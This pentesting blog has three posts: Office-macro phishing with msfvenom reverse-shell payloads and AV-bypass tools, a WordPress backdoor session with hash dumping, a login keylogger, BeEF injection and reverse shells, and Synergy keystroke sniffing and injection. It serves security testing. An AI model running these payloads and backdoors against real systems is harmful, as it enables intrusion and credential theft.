Category: Vulnerability

Phishing with Maldocs

 

There are many ways to run a phishing campaign.  The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website.  Running these campaigns are fairly straight forward, and a couple of tools make this very easy to do.  The most common of all is likely the Social Engineer Toolkit.  SET works great for cloning an existing website and setting up a PHP form to collect credentials.  While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents.

Macro Attacks

The most common Maldoc is a malicious Microsoft Word document.  Typically these will contain embedded Macros which execute a payload when opened.  Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed.  Typically they must click “Enable Content” and the subsequently click “Enable Macros”.

There a quite a few ways you can generate these.  The most simple way is with Metasploit.  As documented here, all you need to do is use msfvenom to generate some malicious visual basic code like so:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

And then paste it into the Visual Basic Editor.

Set up a listener in the Metasploit framework and wait for the user to enable macros.

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y"

While you can use multiple encoding types, this attack is likely to get caught by Anti-Virus.

You can use other tools besides msfvenom to generate the VBA code required for the Macro.  You can also use Unicorn by TrustedSec. To generate the payload use:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload.

OLE Attack

If you like Powershell Empire more than Metasploit, Empire also has a stager for office macros. Enigma0x3 has a good blog post on how to do this.  Also notable is the OLE attack.  Instead of using a macro to execute a payload, you can embed a file within the document itself.  By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload.  This attack is also documented in the same blog post.  This attack will prompt the user before executing payload as seen below:

AV Bypass

Because of the success of the Macro attack method, AV vendors have been quick to adapt.  If AV is causing an issue, there are a few more tools that you can use to avoid detection.  LuckyStrike is a tool that was released at DerbyCon 2016.  The author has a lengthy blog post on this tool that is well worth the read.  LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload ensuring that AV sandbox will never be able to execute it for dynamic analysis.

If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you.  As MRWLabs explains it on thier website, “It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into.”

Capturing Hashes

Now to get into the more exotic methods.  A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server.  When the document is opened, the client will try to connect to the SMB server without any user interaction.  This will capture an NTLM handshake and can be sent to a password cracker just as you would do if you were running Responder within the local network.  The biggest caveat here is that the client network must be able to initiate SMB connections outbound.  This means that they must not be any egress rule blocking port 445.  This is not always the case, but if it goes through this is a good way to collect hashes as the user does not have to do anything other than open the document.  If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter

This attack requires a malicious SMB server.  Fortunately, we can stand this up quite easily by using Metasploit.  Just run the following module:

use auxiliary/server/capture/smb

And it will output any handshakes that it captures.

Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper.

Prompting for credentials

Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here.  The way Phishery works is by using HTTP Basic Authentication delivered over SSL.  This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this:

After clicking “Yes” or bypassing it all together with a valid certificate, the user will receive an authentication prompt.

If they enter their credentials, you will see them posted back to the listening server.

Exploits

While all these require some level of social engineering, you can also exploit the target with an exploit.  Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec had published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit.

If you don’t want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file.  The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a Powershell Empire stager.

At the time of this writing, there is a Metasploit module in development for this attack.  A pull request has been opened, and will likely be merged into the main branch soon.


Squeezing the juice out of a compromised WordPress server

During the course of a penetration test, you may stumble upon a web server running WordPress.  WordPress is a highly popular CMS.  It runs on PHP, and is typically ran on top of a LAMP stack.  While most WordPress servers on the web are configured with strong passwords and security plugins, rarely is this the case on internal networks.  For this reason, attackers can often find vulnerabilities in outdated versions of the software or more simply, guess the administrative password. Once you guess the password, there are a number of different things you can do to pivot to other systems.  Aside from escalating privileges, you can use WordPress itself to launch a number of other attacks against clients.

For these examples, I’m going to be using my own tools that I developed for exploiting WordPress.  While WPScan is arguably the best WordPress security tool, my tool WPForce, has a couple of advantages that we can make use of.  Unlike WPScan, which performs brute force login attempts agains the login page of WordPress, WPForce uses authenticated API calls to test the validity of credentials.  While most security plugins are wise to this method, it does provide slightly more stealth.

After identifying valid credentials, a companion script in the WPForce suite – Yertle, can be used to upload a backdoor onto the WordPress server and execute a number of post exploitation modules.

Running Yertle is relatively simple, just supply the URL, username, password, and type of backdoor.  While there are two types of backdoors available for upload, I prefer the –interactive option.

Once you run the script the tool will login into the WordPress site and upload a plugin.  If at any time you want to access this backdoor again, just supply the -e argument with the name of the upload directory. This plugin will take commands similar to SQLmap‘s os-shell.  To see the available modules, you can just type “help” or “?”.

os-shell> help

Core Commands
=============

Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page

One of the useful post exploitation modules you can run is hashdump.  What hashdump will do is log into the SQL database, query the table containing the password hashes, and return the output.  You can then crack these hashes, and begin trying to use these credentials to move laterally to other systems.

os-shell> hashdump
ID: 1  - Username: admin  Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1  Email: Quaoar@localhost.com
ID: 2  - Username: wpuser  Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.  Email: wpuser@localhost.com
ID: 3  - Username: n00py  Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/.  Email: n00py@protonmail.com

os-shell>

Not only can we collect the hashes, but we can collect plaintext credentials too.  By patching a PHP file within the WordPress core, we can log all passwords in plaintext as the user authenticates.

os-shell> keylogger
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file.
os-shell>

After a warning letting the user know modifications will be made to the WordPress core, the authentication function is patched.

After waiting for a user to login, we can check the log file by typing “keylog” to see the plaintext credentials.

os-shell> keylog
2017-03-30 - Username:  && Password:
2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword

Moving away from credential harvesting but staying within the realm of client attacks, we can also inject a BeEF hook into the site.  This will allow the attacker to run arbitrary JavaScript against any users browsing the site.

os-shell> beef
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
IP Address: 10.0.1.16
BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times.

After injecting the hook, we just wait for a user to browse the site.  Once the user browses the site, they become “hooked”.  At this point we can send any JavaScript payload we want.  BeEF contains a large number of attacks that can be launched against a client.

Demo payload being executed within the client’s browser:

As useful as these modules are, you may want to pivot to another type of shell.  Two options are available: a regular reverse TCP shell, and a PHP meterpreter shell.   To upgrade to a fully interactive shell, just run:

os-shell> shell
IP Address: 10.0.1.4
Port: 8080
Sending reverse shell to 10.0.1.4 port 8080
os-shell>

And listen on the chosen port to receive the shell:

root@Kali:~/WPForce$ nc -l 8080
bash: no job control in this shell
www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$

If you wish to have a meterpreter shell, load up metasploit and run:

os-shell> meterpreter
IP Address: 10.0.1.4
Port: 4444
Sending meterpreter stager to connect back to 10.0.1.4:4444
os-shell>

And receive the meterpreter shell within metasploit:

[*] Started reverse handler on 10.0.1.4:4444
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 10.0.1.21
[*] Meterpreter session 1 opened (10.0.1.4:4444 -> 10.0.1.21:60763) at 2017-03-29 20:49:16 -0600

Lastly, there are a couple ways to be more stealthy when using this tool.  By default, this module registers itself as a plugin within WordPress, and this plugin is visible to an administrator.

To remove the backdoor from the plugin screen, simple run the command “stealth”.  The backdoor will still be accessible, it just will not be visible within the UI.

os-shell> stealth

It is also worth mentioning that Yertle will send the user agent “Yertle backdoor uploader” by default, but can be overridden with the -a flag.  In my experience, this User Agent was causing my IP to be instantly banned when testing against web severs utilizing an IPS.


Compromising Synergy clients with a rogue Synergy server

 

Synergy is a type of mouse an keyboard sharing software. When configured, moving your mouse off the screen will allow you to control another system that is also set up with Synergy. Below is a YouTube video from Synergy on how it works:

The way this works is one host acts as the Synergy server, and the other hosts act as Synergy clients. The clients initiate connections to the server to allow that server to send commands to them, such as moving the mouse, using the keyboard, or accessing the clipboard.

Synergy has two main pricing tiers, Basic, and Pro. They are almost identical, but the Pro version supports SSL encryption.  Symless, the company that develops the Synergy acknowledges the risk of using the un-encrypted version, and suggests to either buy the Pro version, or encapsulate the Synergy traffic within an SSH tunnel.

I was curious about the risk posed by using this software without any additional steps taken to secure the communication channel.  My research didn’t turn up much, only one security researcher discussing a crypto fail in an older version of Pro, and forum threads of a few cautious power users.

The first thing most warned about is eavesdropping on keystrokes, which often times will contain sensitive information to include passwords.  Assuming you have Man-In-The-Middle between a client and server, are on a network using a hub, receiving traffic from a span port, or otherwise have a pcap of the traffic, extracting keystrokes is quite simple.  Here is a few lines of python that will do just that:

from scapy.all import *

def querysniff(pkt):
            if Raw in pkt:
                payload = str(pkt[Raw].load)
                if "DKDN" in payload:
                    sys.stdout.write(payload[9])
  
sniff(filter="tcp and port 24800", prn=querysniff, store=0)

You will need to install scapy to run this.  The code relatively simple, it will begin sniffing on all interfaces for TCP traffic going either to or from port 24800, and each packet that has the string “DKDN” identified a key-down event, meaning a key was pressed to the down position. Assuming they are typing in English, the 9th byte will contain an ASCII character.  This is a basic example and does not address any non-ASCII or non-printable characters, but works as a general proof of concept.

Keystroke monitoring is interesting by itself, but I was curious if there was more that could be done.  Having previously analyzed other protocols such as VNC and HippoConnect, injecting keystrokes onto the target to execute a payload seemed like an interesting type of attack.

After spending some time in Wireshark analyzing the communication between the client and sever, I found a few items of note:

  • The client initiates the communication with the server
  • Commands are sent from the server to the client

This led me to conclude that by impersonating a Synergy server and enticing a client to connect to it, I could compromise the client.

Synergy comes with the ability to perform automatic configuration of a client and server.  It does this by using Bonjour.  To quote the wiki:

Bonjour is one application of the ZeroConf protocol, which was originally designed for things like printers and scanners to be automatically found on a network when a new computer connects. In the old days, you would have to dig into the printer’s settings or print a label on the front of the printer to find its IP address and add it to your setup manually. This protocol was developed to make this process easier. It was also designed to be used with anything which needed to have a client find a server, which is the case with Synergy. We use ZeroConf (Bonjour) to allow Synergy Clients to automatically find Synergy Servers.

If an attacker could advertise their rogue Synergy server via Bonjour, a client with the “Auto config” option checked could connect to it and our rogue server could begin injecting malicious keystrokes to the target.  The caveats to this attack succeeding is that the victim client must not be currently connected to any other Synergy server, and that our server was registered on the top of the MDNS cache.

I developed a python script that will impersonate a Synergy server that I’ve named “Dissonance” and it’s available on GitHub.

I’ve recorded a video of this attack in action.  I find it’s best to watch in at least 1080p to capture all the details. (Yes, I know “rouge” should be “rogue”)

Here is a breakdown of what happened:

  • The attacker ran the Dissonance python script. This opened up port 24800 and sent out Bonjour advertisements
  • The Synergy client clicked the “Auto-config” option.  It used Bonjour to identify the attacker system as a Synergy server
  • It initiated a connection on TCP port 24800 to the attacker
  • The attack script negotiated the connection and began sending keystrokes to the client which opened a command prompt and typed in a payload
  • The payload was a powershell command that was Base64 encoded which would retrieve and execute a Powershell Empire stager
  • The client initiates a connection with the Empire server and the Empire server now has control over the client system

This attack works well, but most likely any Synergy clients you come across will already be connected to a Synergy server.  The next thing to try is to see if it is possible to hijack an existing relationship.  To hijack a client we would have to replace the real server with our own without the client being aware. Fortunately for the attacker, a Synergy client that loses its connection to the server will automatically try to reconnect.

To facilitate this attack, a little bit of recon must be done.  Synergy servers are possible to find via a typical Nmap scan.  Nmap has a fingerprint for Synergy servers and you should see something like this:

root@kali:~# nmap 10.0.1.4 -p 24800 -sV

Starting Nmap 7.25SVN ( https://nmap.org ) at 2017-03-03 00:34 EST
Nmap scan report for 10.0.1.4
Host is up (0.00030s latency).
PORT      STATE SERVICE VERSION
24800/tcp open  synergy Synergy KVM (plaintext)

Another way to identify both clients and servers is by using Bonjour.  Even if you don’t use auto config, Bonjour is installed as part of the set-up process, unless declined.  Both clients and servers register themselves via MDNS when the application is launched.

Here is a video of this attack in action, and it has more moving parts than the last:

Here is the a run-down of what happens in the video:

  • The Synergy client has an active connection with the Synergy server
  • The attacker uses Dissonance to identify the IP addresses of the client and server via Bonjour
  • The attacker assumes the IP of the real Synergy server
  • arpspoof is used to send ARP reply to the Synergy client to update the victims ARP table to identify the attacker as having the MAC address for the IP that belonged to the legitimate Synergy server
  • The client and server lose their connection.  Th client automatically makes attempts to re-establish the connection
  • The attacker starts Dissonance
  • The client connects to the rogue server and begins accepting commands
  • As before, an Empire stager is executed on the client and the client initiates a connection to the Empire server

The next question is if this is possible with the Pro version.  The answer is: Not without user interaction.  When using the Pro version, when a client first initiates a connection to the Server it asks the user to validate the fingerprint.  This is the prompt seen from the client:

If the IP address is hijacked in the attack seen above, such a warning would present itself once the client connected to the rogue server.  If the client were to ignore the content and just click “Yes” this type of attack could still be achieved.  If the user followed the instructions they would certainly click no, but in some environments where users are accustomed to ignoring SSL/TLS certificate warnings, this may be possible.